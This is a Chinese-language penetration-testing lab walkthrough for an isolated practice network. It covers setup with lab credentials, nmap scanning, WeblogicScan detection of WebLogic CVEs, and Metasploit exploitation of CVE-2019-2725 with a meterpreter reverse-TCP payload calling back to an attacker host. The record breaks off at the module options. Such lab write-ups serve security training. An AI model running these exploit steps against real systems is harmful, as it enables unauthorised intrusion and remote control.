目录
环境配置
首先在VMware->编辑->虚拟网络编辑器里 更改子网ip为192.168.111.0
环境说明
- DC
IP:10.10.10.10
OS:Windows 2012
- WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去)
IP1:10.10.10.80
IP2:192.168.111.80
OS:Windows 2008
- PC
IP1:10.10.10.201
IP2:192.168.111.201
OS:Windows 7
- 攻击机
IP:192.168.111.128
OS:Kali
内网网段:10.10.10.0/24
DMZ网段:192.168.111.0/24
管理员账号密码:Administrator/1qaz@WSX
先从WEB机开始,注意需要手动开启服务,在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有一个 startWeblogic 的批处理,管理员身份运行它即可。
信息收集
Nmap进行端口探测
由于防火墙的存在不能使用icmp包,所以使用syn包探测
nmap -sS -sV 192.168.111.80
-sS 使用SYN半开式扫描
-sV 探测服务版本信息
SYN扫描:nmap向服务器发送一个syn数据报文,如果侦测到端口开放并返回SYN-ACK响应报文,nmap立即中断此次连接
此外也可通过常用nmap用法进行端口探测
nmap -A -T4 -v -Pn 192.168.111.80
-A 进行全面扫描(操作系统检测、版本检测、脚本检测和跟踪路由)
-T4 设置时序,级别越高速度越快
-v 显示更加详细的信息
-Pn 无ping扫描
获得信息
中间件:IIS7.5
操作系统:Windows Server 2008 R2
数据库:SQL server (开启了1433端口,SQL server默认端口为1433)
80端口:常见web网站
139端口:对应Samba服务
445端口:对应SMB服务
3389端口:对应开启远程桌面
7001端口:对应存在WebLogic(WebLogic是一种免费的web容器)
漏洞检测
访问80端口
nothing at all,什么都没有
访问7001端口
看来存在业务
检测weblogic是否存在漏洞
这里利用github上一个weblogic漏洞检测工具——WeblogicScan
python3 WeblogicScan.py -u 192.168.111.80 -p 7001
存在cve-2017-10271、cve-2017-3506、cve-2019-2725、cve-2019-2729历史漏洞
漏洞利用
这里使用CVE-2019-2725(Weblogic反序列化漏洞)
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。
打开msf,search cve-2019-2725
set rhosts 192.168.111.80
set lhosts 192.168.111.128
set target Windows
set payload windows/meterpreter/reverse_tcp
msf6 > use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set rhosts 192.168.111.80
rhosts => 192.168.111.80
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set lhost 192.168.111.128
lhost => 192.168.111.128
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows
target => Windows
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > show options
Module options (exploit/multi/misc/weblogic_deserialize_asyncresponseservice):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format